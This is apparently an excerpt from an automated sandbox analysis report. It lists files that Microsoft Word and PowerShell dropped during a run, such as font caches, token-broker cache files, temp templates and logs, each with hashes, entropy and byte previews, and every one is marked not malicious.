                                                Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830

                                                C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Mangal\39115645384.ttf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:TrueType Font data, 22 tables, 1st "GDEF", 42 names, Macintosh, \251 2023 Microsoft Corporation. All Rights Reserved.MangalRegularMangal RegularVersion 6.91;O36
                                                Category:dropped
                                                Size (bytes):194352
                                                Entropy (8bit):6.6123836902410424
                                                Encrypted:false
                                                SSDEEP:3072:E9sq3Y4G3tA5J8v6Ti7Fhne96YaqvnXe/ME1ca4yRFb6TOzmsucjrJDyM0y:EO3tA5yKGc9ZDvY1+QluhgL1
                                                MD5:BD5EDB00A8469B245A27561CBC4447A2
                                                SHA1:5374CA0DC0C5A6E4D242314B94B1A988637357E0
                                                SHA-256:BC4E198F725B4AE70FAFC78FC2028BC63CBC4437BA02F59017AB1485A11523A9
                                                SHA-512:E16A6753C7ABA89393825ECD10D489937F8FA6BB14588B275EAD0E3CD519F396C784B78B15AD457849ACA6ED50E5899D449F6426B8AC88909D8B505E0A758034
                                                Malicious:false
                                                Preview:...........`GDEF5.4...n.....GPOS......o...\bGSUBP..r... ..*.LTSHR......0...~MERG............OS/2..u.......`VDMXx..>........cmapGp..........cvt .../........fpgm......\...ugasp......n.....glyf...2...d....hdmxRa........l.head..u....l...6hhea.P.>.......$hmtx?.w....H....locaS..b...l....maxp.]......... meta..+........5name......eh..._post.~.x..n.... prep'@..................13.o_.<...........@......r.............................~...........................y.....z.i...........@.R...g.u.................3...%...3.....x..............................MS .@..%....~...............J..... ...................M.....W.....].....[..._.......M.4.....u.M.....D.M...M....._.......A...]... ...Y..._...e...Y...Y.M...M.....u...u...u...a.h.w.M...M...M."...M.......;.'.....3...[...^.m.................u...u.....................n...................B.......@...V.......,...,...,.t.,...,.c.,.A.,.e.,.\.,.F.,.Z.......R... ...........%...f.....................................B...d...b...b..................................

                                                C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Mangal\41732083461.ttf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:TrueType Font data, 22 tables, 1st "GDEF", 42 names, Macintosh, \251 2015 Microsoft Corporation. All Rights Reserved.MangalRegularMangal RegularVersion 6.90;O36
                                                Category:dropped
                                                Size (bytes):193136
                                                Entropy (8bit):6.6044407125237194
                                                Encrypted:false
                                                SSDEEP:3072:/dsu3Y493tA5J8v6Ti7Fhne96YaqvnXe/ME1ca4yRFb6TOzmBvO6pNGFwvuu:/R3tA5yKGc9ZDvY1+QluAA3
                                                MD5:166BE18AF632A627BEE81BEF9E9E2E42
                                                SHA1:6D0A2DF5D56B52B52F974F5F30EB8EDCD0F6AC4C
                                                SHA-256:1BF14DB9C98C69FEF33295F9D3138D9F699D3D4117B5B0E72C39B5A06356EEF5
                                                SHA-512:DECDF40889D9B127C9A11C8F44941381AFBF277065F2540B28C946F0068AA46CB81AB2E6B66916A7D81F5CF7AE416645376681C9F19F2F0B5AA58D0E3814522B
                                                Malicious:false
                                                Preview:...........`GDEF..-...j$....GPOSW..*..j...ZbGSUB.9V....@..,.LTSHQ...... ...zMERG.......,....OS/2..u.......`VDMXx..>........cmap...........tcvt .../........fpgm..........ugasp......j.....glyf..O4........hdmx4C.....|..k.head.......l...6hhea.P.;.......$hmtx..v....H....loca...l........maxp.Y......... meta..+....8...5name......`...._post.~.x..i.... prep'@.................f.K.[_.<...........@......o.............................~...........................v.....v.i...........@.R...g.u.................3...%...3.....x..............................MS .@..%....~...............J..... ...................M.....W.....].....[..._.......M.4.....u.M.....D.M...M....._.......A...]... ...Y..._...e...Y...Y.M...M.....u...u...u...a.h.w.M...M...M."...M.......;.'.....3...[...^.m.................u...u.....................n...................B.......@...V.......,...,...,.t.,...,.c.,.A.,.e.,.\.,.F.,.Z.......R... ...........%...f.....................................B...d...b...b..................................

                                                C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_40.ttf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                                Category:dropped
                                                Size (bytes):773040
                                                Entropy (8bit):6.55939673749297
                                                Encrypted:false
                                                SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                                MD5:4296A064B917926682E7EED650D4A745
                                                SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                                SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                                SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                                Malicious:false
                                                Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..

                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2278
                                                Entropy (8bit):3.8449891222805492
                                                Encrypted:false
                                                SSDEEP:48:uiTrlKxsxx8+xl9Il8uwCShYAa9WQ1VIpgLp2d1rc:vfYmxhYntbLpt
                                                MD5:11CC8922964A7B664AD85029A52863F6
                                                SHA1:37F218C088DAB85C52894BA915FBA7C06124E2E7
                                                SHA-256:611A6C4943A252E55EFBBD60F74548EB0DBC62D8D2443E48725B794160ED5980
                                                SHA-512:B86448CA7F63BFECF7F04E0354E44D9A0B6993D9148B4E4E0517AACB952F342930838BA3433F55279C0A2EFB4B0428D0D13095F41E23BCE4F3F056892F39B201
                                                Malicious:false
                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.K.f.2.c.k.U.T.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.h.N.G.m.b.o.

                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):4542
                                                Entropy (8bit):3.9954477679458136
                                                Encrypted:false
                                                SSDEEP:96:ZYmMtfyLOaBkOGLEcytSuQKM0qLXQFwuVCXb3c:ZwtfkOaB21ygnr0qLXQFwuVOM
                                                MD5:8DE66F3E0823B562314B8931711C2905
                                                SHA1:6599558642AD361A492B82BB5E5D93508D9A89C3
                                                SHA-256:C92378109FF759AB5DDB4AB81F347A3C29FC79EE7FEBA91D61D042A3884F54D3
                                                SHA-512:A78EBD0D4616CDFEE447392BCB1ABAE282FDA60904F21D9E3D92D8317312A18704FDF046D8479BF4BE6783E08756B212CAEF987F4790A043AFDBC04FBEC933DE
                                                Malicious:false
                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".4.b.3.F.W.D.0.T.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.h.N.G.m.b.o.

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{D7E5FE39-EC50-4509-AAE8-3FCD60368C7D}.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):8200
                                                Entropy (8bit):3.8318856321032815
                                                Encrypted:false
                                                SSDEEP:96:ersSbH270x93+rw+8/XPoKL3yodr6uPvxHp667Zx+xn92/:e4gEIfohs62pp667ZQ2/
                                                MD5:1DEED1A26B5F090B8EB6A6081DD7B237
                                                SHA1:6CDFB7BE75A7DD83FB200FAD638630E459368EA1
                                                SHA-256:C8EA6B96FCB254459E05F8366EADDE5329F933513912023DEFB3AFF25882082C
                                                SHA-512:655CB8346AF73A6114791C998F597975ACAC09D034A274669CBAE04BC95F1425815F726F992BE43FDC0ACEBDEEBD8AA9490848B02C5568DF49541C68C10B0CE7
                                                Malicious:false
                                                Preview:..!.C.4.>.2.0. .?.>.2.V.A.B.:.0. .?.@.>. .2.8.:.;.8.:. .4.>. .A.C.4.C...2. .A.?.@.0.2.V. .F.8.2.V.;.L.=.V.9.,. .0.4.<.V.=.V.A.B.@.0.B.8.2.=.V.9.,. .?.@.>. .0.4.<.V.=.V.A.B.@.0.B.8.2.=.5. .?.@.0.2.>.?.>.@.C.H.5.=.=.O.,. .V.=.H.V.9...(.?.>.B.@.V.1.=.5. .?.V.4.:.@.5.A.;.8.B.8.).......0.B.0. .4.>.:.C.<.5.=.B.C. .3.1...0.7...2.0.2.3. .!.?.@.0.2.0. ..! .5.8.2./.4.4.5.3./.0.8.....................................................................................................................................................H...............v...x...H........... ...T...........(...............R.............................................................................................................................................................................................................................................................................................................................................$..d......d...d.a$.l........... ..........d......d...d.l........... ..........

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):9434
                                                Entropy (8bit):4.928515784730612
                                                Encrypted:false
                                                SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                MD5:D3594118838EF8580975DDA877E44DEB
                                                SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                Malicious:false
                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Preview:@...e...........................................................

                                                C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1727703090517522300_968E6B0F-5509-4DEA-BFB7-6B9402BE175F.log

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20971520
                                                Entropy (8bit):0.021584002130853812
                                                Encrypted:false
                                                SSDEEP:1536:OlTTdG/qPvQrRhQtPjNNxgrCBgWXUPAJVVsAZE2nvOark6Blz/e:2s
                                                MD5:F6DF1CC817ACCAFE3EF039030F963A47
                                                SHA1:AC4AF99850E7B9B216070DC1BF6BBA7BECA4C337
                                                SHA-256:C5296B9D26AB75A07BC34D8650B7E6811DB94363EA7926DA12C784800B824594
                                                SHA-512:B973C5C116E16B09600D529686A3B0970A6663907B5D8B97C5DF39F428FE43F86CCC38033FD73C0BCFB532AC0171881C8E1FC881CD6C1EA158CD21AF485CD018
                                                Malicious:false
                                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..09/30/2024 13:31:30.749.WINWORD (0x1110).0x1658.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":22,"Time":"2024-09-30T13:31:30.749Z","Contract":"Office.System.Activity","Activity.CV":"D2uOlglV6k2/t2uUAr4XXw.7.1","Activity.Duration":212,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...09/30/2024 13:31:30.749.WINWORD (0x1110).0x1658.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-09-30T13:31:30.749Z","Contract":"Office.System.Activity","Activity.CV":"D2uOlglV6k2/t2uUAr4XXw.7","Activity.Duration":5238,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureD

                                                C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1727703090518086800_968E6B0F-5509-4DEA-BFB7-6B9402BE175F.log

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20971520
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                Malicious:false
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\Return.docx

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Microsoft Word 2007+
                                                Category:dropped
                                                Size (bytes):6594
                                                Entropy (8bit):7.749193097428692
                                                Encrypted:false
                                                SSDEEP:192:fZ78NtR6QvdK78X4Krc41c6VDRX9aqlHs:BQNt11UxScpOs0s
                                                MD5:B705E5332CC50B9619D2D71DCCF04F88
                                                SHA1:D52A56420A525B292E32044F07C2784CAEA32218
                                                SHA-256:736C0128402D83CD3694A5F5BB02072D77385C587311274E3229E9B2FD5C5AF7
                                                SHA-512:C24E7A72FD4C6A764E0C02DE93D2FD44448D1A8FDEC51F142EB9CEBB94C7496D03910410C61EBC51401CF5121480E57C5D25B29D52309C1FF288528CB1DCE778
                                                Malicious:false
                                                Preview:PK........]'.W................_rels/.rels..MK.A.....C..l+...."Bo".........3i...A..P...y....m...N...A.iAq0.0jx.=/.`./.W>..J.\*...a.I...L.41q..!fOR.<b"...q....2..1..j.[....H.76z..$.&f^.\..8..Nyd.`.y.q.j4..x]h.{.8...S4G.A.y.Y8X...(.[Fw.i4o|..l.^.......PK.....#....=...PK........]'.W................docProps/core.xmlmR[K.0.~.W.....e....=9.6Q|..Y.m....7m......;9')....{.N..$I...4o..uI..pF..L...Jr.G..].M.[...5`Q..|.v97%."..R.....C{q.Z..C[S......q.@. .....C3%.S..S...f...B..4:.D..."X.n.0(.N%.h..,N.......?.B?./.a.P.~U.HU..s..[[....Z..V..+..+...z..S...V.e...7.....F.x<....i..:q..!..>K....zA.4N.0..q.N..~...u....^.O.J....O.v_..q.i..F.......|._PK...B..R.......PK........]'.W................docProps/app.xml.Q.n. .}.W...R...4.=5Y..vo..UY......6s>.^..p.p..2.....J..$...$W...:.(_gE.X.d.z%a.^....@vFi0N......sN..........3.2.s.......^.?. ..q.#.8.5.3=..w.....V..~v_^.....A...%.,.c})...o..<i..........[.ZD...q+..r.,.c.....?...C...,R....q.`<.....i..I....U..A....}.4....Gv..K1A.....

                                                C:\Users\user\AppData\Local\Temp\TCDF018.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):256
                                                Entropy (8bit):3.4842773155694724
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                                MD5:923D406B2170497AD4832F0AD3403168
                                                SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                                SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                                SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF018.tmp\ConvergingText.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):11380
                                                Entropy (8bit):7.891971054886943
                                                Encrypted:false
                                                SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                Malicious:false
                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q

                                                C:\Users\user\AppData\Local\Temp\TCDF029.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):286
                                                Entropy (8bit):3.538396048757031
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                                                MD5:149948E41627BE5DC454558E12AF2DA4
                                                SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                                SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                                SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDF029.tmp\sist02.xsl

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):250983
                                                Entropy (8bit):5.057714239438731
                                                Encrypted:false
                                                SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                MD5:F883B260A8D67082EA895C14BF56DD56
                                                SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                C:\Users\user\AppData\Local\Temp\TCDF02B.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):302
                                                Entropy (8bit):3.537169234443227
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                                                MD5:9C00979164E78E3B890E56BE2DF00666
                                                SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                                SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
